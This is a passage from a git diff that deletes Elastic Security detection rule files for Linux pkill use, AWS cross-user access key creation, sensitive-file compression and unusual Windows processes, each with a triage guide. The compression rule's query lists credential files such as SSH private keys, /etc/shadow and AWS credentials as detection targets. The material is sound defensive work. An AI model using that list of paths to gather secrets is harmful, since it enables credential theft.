False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further destructive behavior, which is commonly associated with this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system or restore it to the operational state.\n- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look for ransomware preparation and execution activities.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "event.category:process and host.os.type:linux and event.type:start and process.name:\"pkill\" and process.args:\"-f\"\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - }, - { - "package": "auditd_manager", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.args", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "67f8443a-4ff3-4a70-916d-3cfa3ae9f02b", - "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Impact", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Auditd Manager" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0040", - "name": "Impact", - "reference": "https://attack.mitre.org/tactics/TA0040/" - }, - "technique": [ - { - "id": "T1489", - "name": "Service Stop", - "reference": "https://attack.mitre.org/techniques/T1489/" - } - ] - } - ], - "threshold": { - "field": [ - "host.id", - "process.executable", - "user.name" - ], - "value": 10 - }, - "timestamp_override": "event.ingested", - "type": "threshold", - "version": 114 - }, - "id": "67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_114", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/696015ef-718e-40ff-ac4a-cc2ba88dbeeb_9.json b/packages/security_detection_engine/kibana/security_rule/696015ef-718e-40ff-ac4a-cc2ba88dbeeb_9.json deleted file mode 100644 index 95490104490..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/696015ef-718e-40ff-ac4a-cc2ba88dbeeb_9.json +++ /dev/null @@ -1,258 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "An adversary with access to a set of compromised credentials may attempt to persist or escalate privileges by creating a new set of credentials for an existing user. This rule looks for use of the IAM `CreateAccessKey` API operation to create new programmatic access keys for another IAM user.", - "false_positives": [ - "While this can be normal behavior, it should be investigated to ensure validity. Verify whether the user identity should be using the IAM `CreateAccessKey` for the targeted user." - ], - "from": "now-6m", - "investigation_fields": { - "field_names": [ - "@timestamp", - "user.name", - "user_agent.original", - "source.ip", - "aws.cloudtrail.user_identity.arn", - "aws.cloudtrail.user_identity.type", - "aws.cloudtrail.user_identity.access_key_id", - "user.target.name", - "event.action", - "event.outcome", - "cloud.region", - "cloud.account.id", - "aws.cloudtrail.request_parameters", - "aws.cloudtrail.response_elements" - ] - }, - "language": "esql", - "license": "Elastic License v2", - "name": "AWS IAM User Created Access Keys For Another User", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n\n### Investigating AWS IAM User Created Access Keys For Another User\n\nAWS IAM access keys are long-term credentials that grant programmatic access to AWS resources. The `iam:CreateAccessKey` permission allows an IAM principal to generate new access keys for an existing IAM user. \nWhile this operation can be legitimate (for example, credential rotation), it can also be abused to establish persistence or privilege escalation if one user creates keys for another account without authorization.\n\nThis rule identifies `CreateAccessKey` API calls where the calling user (`aws.cloudtrail.user_identity.arn`) differs from the target user (`aws.cloudtrail.request_parameters.userName`), indicating one IAM identity creating credentials for another.\n\n#### Possible investigation steps\n\n- **Confirm both user identities and intent.** \n Identify the calling user (who performed `CreateAccessKey`) and the target user (whose access key was created). Contact both account owners or application teams to confirm if this operation was expected.\n\n- **Review CloudTrail event details.** \n Check the following fields directly in the alert or corresponding CloudTrail record: \n - `source.ip` \u2014 does it align with expected corporate ranges or known admin automation? \n - `user_agent.original` \u2014 AWS Console, CLI, SDK, or custom client? Unexpected user agents (for example, non-SDK scripts) may indicate manual or unauthorized use. \n - `source.geo` fields \u2014 verify the location details are expected for the identity.\n\n- **Correlate with related IAM activity.** \n In CloudTrail, search for subsequent or nearby events such as: \n - `AttachUserPolicy`, `AttachGroupPolicy`, `UpdateAssumeRolePolicy`, or `CreateUser`. \n These can indicate privilege escalation or lateral movement. \n Also review whether the same principal recently performed `CreateAccessKey` for multiple users or repeated this action across accounts.\n\n- **Inspect the new access key\u2019s usage.** \n Search for the newly created key ID (`aws.cloudtrail.response_elements.accessKey.accessKeyId`) in CloudTrail events following creation. Determine if it was used from unusual IP addresses, geographies, or services. \n\n- **Assess the risk of credential compromise.** \n If you suspect malicious behavior, consider the following indicators: \n - A non-admin user invoking `CreateAccessKey` for another user. \n - Creation outside of normal automation pipelines. \n - Use of the new key from a different IP or AWS account soon after creation.\n\n- **Scope related activity.** \n Review all activity from the calling user in the past 24\u201348 hours, focusing on `iam:*` API calls and resource creation events. \n Correlate any S3, EC2, or KMS access attempts made using the new key to identify potential impact or data exposure.\n\n### False positive analysis\n\n- **Expected credential rotation.** \n Some environments delegate credential rotation responsibilities to centralized automation or specific admin roles. Confirm if the calling user is authorized for such actions. \n- **Administrative workflows.** \n Account provisioning systems may legitimately create keys on behalf of users. Check for standard tags, automation tools, or user agents that indicate managed operations. \n- **Service-linked roles or external IAM automation.** \n Some AWS services create or rotate credentials automatically. Validate if the caller is a service-linked role or an automation IAM role used by a known deployment process.\n\n### Response and remediation\n\n> AWS IR playbooks classify unauthorized credential creation as a **Priority-1 incident** because it may allow persistence or privilege escalation. \n> The following steps scale for organizations with or without a dedicated IR team.\n\n**1. Immediate containment**\n- Deactivate or delete the access key from the target IAM user immediately using the AWS Console, CLI, or API (`DeleteAccessKey`). \n- Rotate or reset credentials for both the calling and target users to eliminate possible compromise. \n- Restrict risky principals. Temporarily deny `iam:CreateAccessKey` and `iam:UpdateAccessKey` permissions for non-administrative roles while scoping the incident. \n- Enable or confirm MFA on both accounts involved, if not already enforced.\n\n**2. Evidence preservation**\n- Export all related `CreateAccessKey`, `DeleteAccessKey`, and `UpdateAccessKey` events within \u00b130 minutes of the alert to an evidence bucket. \n- Preserve CloudTrail, GuardDuty, and AWS Config data for the same period. \n- Record key event details: caller ARN, target user, `accessKeyId`, `source.ip`, `userAgent`, and timestamps.\n\n**3. Scoping and investigation**\n- Search CloudTrail for usage of the new access key ID after creation. Identify any API activity or data access tied to it. \n- Review IAM policy changes, group modifications, or new role assumptions around the same time. \n- Determine if any additional credentials or trust policy changes were made by the same actor. \n- Check for GuardDuty findings referencing anomalous credential usage or suspicious API behavior.\n\n**4. Recovery and hardening**\n- Remove or disable any unauthorized keys and re-enable only verified credentials. \n- Implement least-privilege IAM policies to limit which users can perform `CreateAccessKey`. \n- Monitor for future `CreateAccessKey` events where `userIdentity.arn != request_parameters.userName`. \n- Ensure Cloudtrail, GuardDuty and Security Hub are active across all regions. \n- Educate administrative users on secure key rotation processes and the risk of cross-user key creation. \n\n### Additional information\n\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/):** Reference \u201cCredential Compromise\u201d and \u201cIAM Misuse\u201d procedures for containment and recovery. \n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/):** See \u201cIdentity Access Review\u201d and \u201cUnauthorized Access Key Creation\u201d for example response flows. \n- **AWS Documentation:** [Best practices for managing access keys](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_access-keys.html). \n- **Security Best Practices:** [AWS Knowledge Center \u2013 Security Best Practices](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/). \n", - "query": "from logs-aws.cloudtrail-* metadata _id, _version, _index\n| where event.dataset == \"aws.cloudtrail\"\n and event.provider == \"iam.amazonaws.com\"\n and event.action == \"CreateAccessKey\"\n and event.outcome == \"success\"\n and user.name != user.target.name\n| keep\n @timestamp,\n cloud.account.id,\n cloud.region,\n event.provider,\n event.action,\n event.outcome,\n event.dataset,\n user.name,\n source.address,\n source.ip,\n user.target.name,\n user_agent.original,\n aws.cloudtrail.request_parameters,\n aws.cloudtrail.response_elements,\n aws.cloudtrail.user_identity.arn,\n aws.cloudtrail.user_identity.type,\n aws.cloudtrail.user_identity.access_key_id,\n source.geo.*\n", - "references": [ - "https://hackingthe.cloud/aws/exploitation/iam_privilege_escalation/#iamcreateaccesskey", - "https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence", - "https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud", - "https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateAccessKey.html" - ], - "related_integrations": [ - { - "package": "aws", - "version": "^4.0.0" - }, - { - "integration": "cloudtrail", - "package": "aws", - "version": "^4.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "@timestamp", - "type": "date" - }, - { - "ecs": false, - "name": "aws.cloudtrail.request_parameters", - "type": "keyword" - }, - { - "ecs": false, - "name": "aws.cloudtrail.response_elements", - "type": "keyword" - }, - { - "ecs": false, - "name": "aws.cloudtrail.user_identity.access_key_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "aws.cloudtrail.user_identity.arn", - "type": "keyword" - }, - { - "ecs": false, - "name": "aws.cloudtrail.user_identity.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "cloud.account.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "cloud.region", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.address", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.city_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.continent_code", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.continent_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.country_iso_code", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.country_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.location", - "type": "geo_point" - }, - { - "ecs": true, - "name": "source.geo.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.postal_code", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.region_iso_code", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.region_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.timezone", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.ip", - "type": "ip" - }, - { - "ecs": true, - "name": "user.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "user.target.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "user_agent.original", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "696015ef-718e-40ff-ac4a-cc2ba88dbeeb", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS IAM", - "Use Case: Identity and Access Audit", - "Tactic: Privilege Escalation", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/", - "subtechnique": [ - { - "id": "T1098.001", - "name": "Additional Cloud Credentials", - "reference": "https://attack.mitre.org/techniques/T1098/001/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0004", - "name": "Privilege Escalation", - "reference": "https://attack.mitre.org/tactics/TA0004/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/", - "subtechnique": [ - { - "id": "T1098.001", - "name": "Additional Cloud Credentials", - "reference": "https://attack.mitre.org/techniques/T1098/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 9 - }, - "id": "696015ef-718e-40ff-ac4a-cc2ba88dbeeb_9", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_210.json b/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_210.json deleted file mode 100644 index ac469831738..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_210.json +++ /dev/null @@ -1,126 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the use of a compression utility to collect known files containing sensitive information, such as credentials and system configurations.", - "from": "now-9m", - "history_window_start": "now-10d", - "index": [ - "auditbeat-*", - "logs-endpoint.events.*", - "endgame-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Sensitive Files Compression", - "new_terms_fields": [ - "host.id", - "process.command_line", - "process.parent.executable" - ], - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Sensitive Files Compression\n\nCompression utilities like zip, tar, and gzip are essential for efficiently managing and transferring files. However, adversaries can exploit these tools to compress and exfiltrate sensitive data, such as SSH keys and configuration files. The detection rule identifies suspicious compression activities by monitoring process executions involving these utilities and targeting known sensitive file paths, thereby flagging potential data collection and credential access attempts.\n\n### Possible investigation steps\n\n- Review the process execution details to identify the user account associated with the compression activity, focusing on the process.name and process.args fields.\n- Examine the command line arguments (process.args) to determine which specific sensitive files were targeted for compression.\n- Check the event.timestamp to establish a timeline and correlate with other potentially suspicious activities on the host.\n- Investigate the host's recent login history and user activity to identify any unauthorized access attempts or anomalies.\n- Analyze network logs for any outbound connections from the host around the time of the event to detect potential data exfiltration attempts.\n- Assess the integrity and permissions of the sensitive files involved to determine if they have been altered or accessed inappropriately.\n\n### False positive analysis\n\n- Routine system backups or administrative tasks may trigger the rule if they involve compressing sensitive files for legitimate purposes. Users can create exceptions for known backup scripts or administrative processes by excluding specific process names or command-line arguments associated with these tasks.\n- Developers or system administrators might compress configuration files during development or deployment processes. To handle this, users can whitelist specific user accounts or directories commonly used for development activities, ensuring these actions are not flagged as suspicious.\n- Automated scripts or cron jobs that regularly archive logs or configuration files could be mistakenly identified as threats. Users should review and exclude these scheduled tasks by identifying their unique process identifiers or execution patterns.\n- Security tools or monitoring solutions that periodically compress and transfer logs for analysis might be misinterpreted as malicious. Users can exclude these tools by specifying their process names or paths in the detection rule exceptions.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further data exfiltration and unauthorized access.\n- Terminate any suspicious processes identified by the detection rule to halt ongoing compression and potential data exfiltration activities.\n- Conduct a thorough review of the compressed files and their contents to assess the extent of sensitive data exposure and determine if any data has been exfiltrated.\n- Change all credentials associated with the compromised files, such as SSH keys and AWS credentials, to prevent unauthorized access using stolen credentials.\n- Restore any altered or deleted configuration files from a known good backup to ensure system integrity and functionality.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.\n- Implement enhanced monitoring and logging for compression utilities and sensitive file access to detect and respond to similar threats more effectively in the future.", - "query": "event.category:process and host.os.type:linux and event.type:start and\n process.name:(zip or tar or gzip or hdiutil or 7z) and\n process.args:\n (\n /root/.ssh/id_rsa or\n /root/.ssh/id_rsa.pub or\n /root/.ssh/id_ed25519 or\n /root/.ssh/id_ed25519.pub or\n /root/.ssh/authorized_keys or\n /root/.ssh/authorized_keys2 or\n /root/.ssh/known_hosts or\n /root/.bash_history or\n /etc/hosts or\n /home/*/.ssh/id_rsa or\n /home/*/.ssh/id_rsa.pub or\n /home/*/.ssh/id_ed25519 or\n /home/*/.ssh/id_ed25519.pub or\n /home/*/.ssh/authorized_keys or\n /home/*/.ssh/authorized_keys2 or\n /home/*/.ssh/known_hosts or\n /home/*/.bash_history or\n /root/.aws/credentials or\n /root/.aws/config or\n /home/*/.aws/credentials or\n /home/*/.aws/config or\n /root/.docker/config.json or\n /home/*/.docker/config.json or\n /etc/group or\n /etc/passwd or\n /etc/shadow or\n /etc/gshadow\n )\n", - "references": [ - "https://www.trendmicro.com/en_ca/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^9.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.args", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "6b84d470-9036-4cc0-a27c-6d90bbfe81ab", - "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Collection", - "Tactic: Credential Access", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1552", - "name": "Unsecured Credentials", - "reference": "https://attack.mitre.org/techniques/T1552/", - "subtechnique": [ - { - "id": "T1552.001", - "name": "Credentials In Files", - "reference": "https://attack.mitre.org/techniques/T1552/001/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0009", - "name": "Collection", - "reference": "https://attack.mitre.org/tactics/TA0009/" - }, - "technique": [ - { - "id": "T1560", - "name": "Archive Collected Data", - "reference": "https://attack.mitre.org/techniques/T1560/", - "subtechnique": [ - { - "id": "T1560.001", - "name": "Archive via Utility", - "reference": "https://attack.mitre.org/techniques/T1560/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 210 - }, - "id": "6b84d470-9036-4cc0-a27c-6d90bbfe81ab_210", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_212.json b/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_212.json deleted file mode 100644 index 3c646efa785..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_212.json +++ /dev/null @@ -1,74 +0,0 @@ -{ - "attributes": { - "anomaly_threshold": 50, - "author": [ - "Elastic" - ], - "description": "Identifies rare processes that do not usually run on individual hosts, which can indicate execution of unauthorized services, malware, or persistence mechanisms. Processes are considered rare when they only run occasionally as compared with other processes running on the host.", - "false_positives": [ - "A newly installed program or one that runs rarely as part of a monthly or quarterly workflow could trigger this alert." - ], - "from": "now-45m", - "interval": "15m", - "license": "Elastic License v2", - "machine_learning_job_id": [ - "v3_rare_process_by_host_windows" - ], - "name": "Unusual Process For a Windows Host", - "note": "## Triage and analysis\n\n### Investigating Unusual Process For a Windows Host\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for an individual Windows host in your environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "references": [ - "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - }, - { - "package": "windows", - "version": "^2.0.0" - } - ], - "risk_score": 21, - "rule_id": "6d448b96-c922-4adb-b51c-b767f1ea5b76", - "setup": "## Setup\n\nThis rule requires the installation of associated Machine Learning jobs, as well as data coming in from one of the following integrations:\n- Elastic Defend\n- Windows\n\n### Anomaly Detection Setup\n\nOnce the rule is enabled, the associated Machine Learning job will start automatically. You can view the Machine Learning job linked under the \"Definition\" panel of the detection rule. If the job does not start due to an error, the issue must be resolved for the job to commence successfully. For more details on setting up anomaly detection jobs, refer to the [helper guide](https://www.elastic.co/guide/en/kibana/current/xpack-ml-anomalies.html).\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration to your system:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click 